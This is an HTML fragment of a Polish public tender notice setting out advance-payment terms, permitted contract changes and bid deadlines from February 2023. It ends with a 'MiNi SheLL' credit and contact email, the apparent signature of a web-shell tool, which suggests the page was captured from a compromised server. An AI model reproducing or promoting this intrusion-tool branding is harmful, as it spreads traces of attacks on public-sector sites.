PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje wypłatę zaliczki o łącznej wysokości 5% wynagrodzenia należnego Wykonawcy. Zaliczka stanowi zapłatę części wartości wynagrodzenia Wykonawcy ustalonego w § 7 ust. 2 PPU, a jej wysokość zostanie potrącona przy ostatecznej zapłacie wykonawcy. <br/>W przypadku, gdy umowa zostanie rozwiązana przez którąkolwiek ze stron lub z jakichkolwiek innych przyczyn nie dojdzie do jej wykonania, zaliczka podlega zwrotowi. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zakazuje się istotnych zmian postanowień umowy dla wprowadzenia których zgodnie z art. 454 Ppz wymagane jest przeprowadzenie nowego postępowania o udzielenie zamówienia.<br/>2.Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy - opisane w §19 pkt.c) PPU<br/>Zmiana wynagrodzenia za realizację zadań objętych niniejszą Umową w przypadku zmiany stawki podatku VAT oraz pozostałe warunki opisane w §19pkt. 3 PPU. 4.Wszelkie zmiany niniejszej Umowy wymagają zgody obu Stron wyrażonej w formie pisemnej w postaci aneksu do Umowy pod rygorem nieważności, z wyjątkiem zmiany stawki podatku od towarów i usług, która jest skuteczna od dnia jej wejścia w życie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com